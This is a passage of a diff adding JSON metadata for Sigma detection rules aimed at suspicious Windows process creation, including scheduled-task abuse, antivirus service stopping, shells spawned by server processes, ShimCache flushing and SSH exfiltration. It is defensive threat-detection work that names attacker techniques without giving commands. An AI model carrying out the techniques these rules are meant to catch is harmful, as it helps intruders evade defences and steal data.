"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ], + "creation_date": "2022/04/15", + "filename": "proc_creation_win_susp_schtasks_folder_combos.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", + "uuid": "9494479d-d994-40bf-a8b1-eea890237021", + "value": "Suspicious Add Scheduled Task Parent", + "meta": { + "refs": [ + "https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ], + "creation_date": "2022/02/23", + "filename": "proc_creation_win_susp_schtasks_parent.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Software installers that run from temporary folders and also install scheduled tasks" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "uuid": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "value": "Suspicious Add Scheduled Command Pattern", + "meta": { + "refs": [ + "https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ], + "creation_date": "2022/02/23", + "filename": "proc_creation_win_susp_schtasks_pattern.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Software installers that run from temporary folders and also install scheduled tasks" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "uuid": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "value": "Suspicious Schtasks Schedule Types", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ], + "creation_date": "2022/09/09", + "filename": "proc_creation_win_susp_schtasks_schedule_type.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitmate processes that run at logon. Filter according to your environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", + "uuid": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "value": "Suspicious Schtasks Schedule Type With High Privileges", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ], + "creation_date": "2022/08/31", + "filename": "proc_creation_win_susp_schtasks_schedule_type_system.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Some installers were seen using this method of creation unfortunately. Filter them in your environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "schtasks.exe create task from user AppData\\Local\\Temp", + "uuid": "43f487f0-755f-4c2a-bce7-d6d2eec2fcf8", + "value": "Suspicious Add Scheduled Task From User AppData Temp", + "meta": { + "refs": [ + "malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_user_temp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ], + "creation_date": "2021/11/03", + "filename": "proc_creation_win_susp_schtasks_user_temp.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of scheduled tasks in user session", + "uuid": "92626ddd-662c-49e3-ac59-f6535f12d189", + "value": "Scheduled Task Creation", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.005", + "attack.s0111", + "car.2013-08-001" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_schtask_creation.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Administrative activity", + "Software installation" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "uuid": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "value": "Suspicious Scheduled Task Creation Involving Temp Folder", + "meta": { + "refs": [ + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2021/03/11", + "filename": "proc_creation_win_susp_schtask_creation_temp_folder.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative activity", + "Software installation" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "uuid": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "value": "ScreenConnect Remote Access", + "meta": { + "refs": [ + "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ], + "creation_date": "2021/02/11", + "filename": "proc_creation_win_susp_screenconnect_access.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use by administrative staff" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "uuid": "0fc35fc3-efe6-4898-8a37-0b233339524f", + "value": "Suspicious ScreenSave Change by Reg.exe", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screensaver_reg.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.002" + ], + "creation_date": "2021/08/19", + "filename": "proc_creation_win_susp_screensaver_reg.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "GPO" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious file execution by wscript and cscript", + "uuid": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "value": "WSF/JSE/JS/VBA/VBE File Execution", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_script_execution.yml", + "author": "Michael Haag", + "level": "medium", + "falsepositive": [ + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "uuid": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "value": "Script Interpreter Execution From Suspicious Folder", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/02/08", + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious script executions from temporary folder", + "uuid": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "value": "Suspicious Script Execution From Temp Folder", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2021/07/14", + "filename": "proc_creation_win_susp_script_exec_from_temp.yml", + "author": "Florian Roth, Max Altgelt, Tim Shelton", + "level": "high", + "falsepositive": [ + "Administrative scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", + "uuid": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", + "value": "Potential Suspicious Activity Using SeCEdit", + "meta": { + "refs": [ + "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml" + ], + "tags": [ + "attack.discovery", + "attack.persistence", + "attack.defense_evasion", + "attack.credential_access", + "attack.privilege_escalation", + "attack.t1562.002", + "attack.t1547.001", + "attack.t1505.005", + "attack.t1556.002", + "attack.t1562", + "attack.t1574.007", + "attack.t1564.002", + "attack.t1546.008", + "attack.t1546.007", + "attack.t1547.014", + "attack.t1547.010", + "attack.t1547.002", + "attack.t1557", + "attack.t1082" + ], + "creation_date": "2022/11/18", + "filename": "proc_creation_win_susp_secedit.yml", + "author": "Janantha Marasinghe", + "level": "medium", + "falsepositive": [ + "Legitimate administrative use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious DACL modifications that can be used to hide services or make them unstopable", + "uuid": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "value": "Suspicious Service DACL Modification", + "meta": { + "refs": [ + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003" + ], + "creation_date": "2020/10/16", + "filename": "proc_creation_win_susp_service_dacl_modification.yml", + "author": "Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "uuid": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "meta": { + "refs": [ + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003" + ], + "creation_date": "2022/10/18", + "filename": "proc_creation_win_susp_service_dacl_modification_set_service.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a service binary running in a suspicious directory", + "uuid": "883faa95-175a-4e22-8181-e5761aeb373c", + "value": "Suspicious Service Binary Directory", + "meta": { + "refs": [ + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2021/03/09", + "filename": "proc_creation_win_susp_service_dir.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services.\nAdversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service\n", + "uuid": "6783aa9e-0dc3-49d4-a94a-8b39c5fd700b", + "value": "Stop Or Remove Antivirus Service", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/07/07", + "filename": "proc_creation_win_susp_service_modification.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "uuid": "138d3531-8793-4f50-a2cd-f291b2863d78", + "value": "Suspicious Service Path Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_susp_service_path_modification.yml", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (update)", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of one of the the commands to stop services such as 'net', 'sc'...etc in order to stop critical or important windows services such as AV, Backup...etc. As seen being used in some ransomware scripts", + "uuid": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "value": "Suspicious Stop Windows Service", + "meta": { + "refs": [ + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", + "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1489" + ], + "creation_date": "2022/09/01", + "filename": "proc_creation_win_susp_service_stop.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Administrator or tools shutting down the services due to upgrade or removal purposes. If you experience some FP please consider adding filters to the parent process launching this command and not removing the entry" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", + "uuid": "75578840-9526-4b2a-9462-af469a45e767", + "value": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" + ], + "creation_date": "2021/07/14", + "filename": "proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", + "uuid": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "value": "Suspicious Serv-U Process Pattern", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" + ], + "creation_date": "2021/07/14", + "filename": "proc_creation_win_susp_servu_process_pattern.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "uuid": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "value": "Suspicious Execution of SharpView Aka PowerView", + "meta": { + "refs": [ + "https://github.com/tevora-threat/SharpView/", + "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" + ], + "creation_date": "2021/12/10", + "filename": "proc_creation_win_susp_sharpview.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "uuid": "d87bd452-6da1-456e-8155-7dc988157b7d", + "value": "Suspicious Usage Of ShellExec_RunDLL", + "meta": { + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/09/01", + "filename": "proc_creation_win_susp_shellexec_rundll_usage.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", + "uuid": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", + "value": "Suspicious Shells Spawned by Java", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "creation_date": "2021/12/17", + "filename": "proc_creation_win_susp_shell_spawn_by_java.yml", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate calls to system binaries", + "Company specific internal usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", + "uuid": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "value": "Suspicious Shells Spawn by Java Utility Keytool", + "meta": { + "refs": [ + "https://redcanary.com/blog/intelligence-insights-december-2021", + "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "creation_date": "2021/12/22", + "filename": "proc_creation_win_susp_shell_spawn_by_java_keytool.yml", + "author": "Andreas Hunkeler (@Karneades)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "value": "Suspicious Shells Spawn by SQL Server", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml" + ], + "tags": [ + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "creation_date": "2020/12/11", + "filename": "proc_creation_win_susp_shell_spawn_from_mssql.yml", + "author": "FPT.EagleEye Team, wagga", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "uuid": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "value": "Suspicious Processes Spawned by WinRM", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_winrm.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "creation_date": "2021/05/20", + "filename": "proc_creation_win_susp_shell_spawn_from_winrm.yml", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "level": "high", + "falsepositive": [ + "Legitimate WinRM usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "uuid": "b0524451-19af-4efa-a46f-562a977f792e", + "value": "ShimCache Flush", + "meta": { + "refs": [ + "https://medium.com/@blueteamops/shimcache-flush-89daff28d15e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2021/02/01", + "filename": "proc_creation_win_susp_shimcache_flush.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Use of the commandline to shutdown or reboot windows", + "uuid": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "value": "Suspicious Execution of Shutdown", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shutdown.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ], + "creation_date": "2022/01/01", + "filename": "proc_creation_win_susp_shutdown.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "uuid": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", + "value": "Suspicious Splwow64 Without Params", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1429401053229891590?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_susp_splwow64.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "uuid": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "value": "Suspicious Spool Service Child Process", + "meta": { + "refs": [ + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_spoolsv_child_processes.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2021/07/11", + "filename": "proc_creation_win_susp_spoolsv_child_processes.yml", + "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Possible Squirrel Packages Manager as Lolbin", + "uuid": "fa4b21c9-0057-4493-b289-2556416ae4d7", + "value": "Squirrel Lolbin", + "meta": { + "refs": [ + "http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/", + "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2019/11/12", + "filename": "proc_creation_win_susp_squirrel_lolbin.yml", + "author": "Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", + "level": "medium", + "falsepositive": [ + "1Clipboard", + "Beaker Browser", + "Caret", + "Collectie", + "Discord", + "Figma", + "Flow", + "Ghost", + "GitHub Desktop", + "GitKraken", + "Hyper", + "Insomnia", + "JIBO", + "Kap", + "Kitematic", + "Now Desktop", + "Postman", + "PostmanCanary", + "Rambox", + "Simplenote", + "Skype", + "Slack", + "SourceTree", + "Stride", + "Svgsus", + "WebTorrent", + "WhatsApp", + "WordPress.com", + "Atom", + "Gitkraken", + "Slack", + "Teams" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "value": "Suspicious SSH Port Forwarding", + "meta": { + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_port_forward.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" + ], + "creation_date": "2022/10/12", + "filename": "proc_creation_win_susp_ssh_port_forward.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Administrative activity using a remote port forwarding to a local port" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "value": "Suspicious SSH Usage RDP Tunneling", + "meta": { + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ], + "creation_date": "2022/10/12", + "filename": "proc_creation_win_susp_ssh_usage.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious svchost process start", + "uuid": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "value": "Suspicious Svchost Process", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ], + "creation_date": "2017/08/15", + "filename": "proc_creation_win_susp_svchost.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "uuid": "16c37b52-b141-42a5-a3ea-bbe098444397", + "value": "Suspect Svchost Activity", + "meta": { + "refs": [ + "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost_no_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2019/12/28", + "filename": 